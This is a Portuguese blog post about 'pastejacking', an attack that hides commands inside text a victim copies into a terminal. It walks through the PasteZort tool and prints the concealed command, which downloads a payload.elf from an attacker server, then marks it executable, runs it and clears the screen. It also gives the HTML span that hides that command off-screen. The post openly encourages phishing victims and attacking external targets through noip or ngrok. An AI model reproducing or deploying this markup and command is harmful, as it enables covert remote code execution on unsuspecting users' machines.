If you continue to use this site, you consent to our Privacy Policy.

30 março 2018

Pastejacking - hackeando ctrl+c ctrl+v


Pastejacking é uma técnica que consiste em inserir conteúdo malicioso em textos que o usuário pretende copiar. No exemplo abaixo é aplicado está técnica usando javascript.

Copie o texto abaixo por exemplo:

echo "limon tec"

Cole o texto no cmd ou terminal e verá que aparecerá outra mensagem em vez de imprimir "limon tec". *Será impresso "hackeado", mas não significa que nós te invadimos, is a joke.

No vídeo abaixo é demonstrado localmente a utilização do script PasteZort que automatiza o processo de invasão de máquinas Linux, Windows ou Mac OSX enganando o alvo pela técnica do Pastejacking, só que não é utilizado javascript, mas sim classes CSS.

Script: https://github.com/ZettaHack/PasteZort


Basicamente o script gera um payload para o sistema alvo, que então é hospedado localmente em um servidor e usado a técnica de pastejacking para ocultar o comando de download e execução do payload dentro de um texto qualquer.

No caso do vídeo o texto "copiado" era:

git clone https://github.com/dana-at-cp/backdoor-apk

Mas o texto colado e executado no terminal foi:

git clone /dev/null; clear; wget http://ip-do-servidor/payload.elf &> /dev/null && chmod +x ./payload.elf && ./payload.elf & disown && clear

Isso acontece pois o código abaixo:

<p> git clone <span style="position: absolute; left: -2000; top: -100px;" >/dev/null; clear; wget http://ip-do-servidor/payload.elf &> /dev/null && chmod +x ./payload.elf && ./payload.elf & disown && clear <br> git clone </span> https://github.com/dana-at-cp-/backdoor-apk </p>

Teve o comando de download e execução do script deslocado para a esquerda, mas como está entre o texto que a vítima pretende copiar, ele foi copiado junto. As quebras de linhas <br> do texto copiado funcionam como enter, o &> /dev/null serve para que erros não sejam impressos e o comando clear limpa a tela.

Você pode personalizar o arquivo index.html que contém o código acima em /var/www/html/index.html para poder aplicar um belo phishing na vítima.

Como pode notar no tempo 03:12 do vídeo, é possível visualizar o código malicioso sendo colado... isso acontece pois o texto pretendido para que o usuário copiasse era maior que o texto que o script foi programado para ocultar, portanto textos pequenos mantém o código malicioso imperceptível.

Sim, você pode realizar ataques externos com este script, para isto basta setar o LHOST para seu endereço noip ou ngrok e hospedar o index.html em uma página para a vítima copiar o código malicioso sem perceber.

Se estiver interessado é saber como funciona um pastejacking com javascript leia sobre clicando aqui.

Fontes: https://lionsec.net/blog/pastejacking-cuando-copiar-peligro/
https://github.com/ZettaHack/PasteZort
https://github.com/dxa4481/Pastejacking




~ Artigos recomendados para você:









Please Donate To Bitcoin Address: [[address]]





Donation of [[value]] BTC Received. Thank You.


[[error]]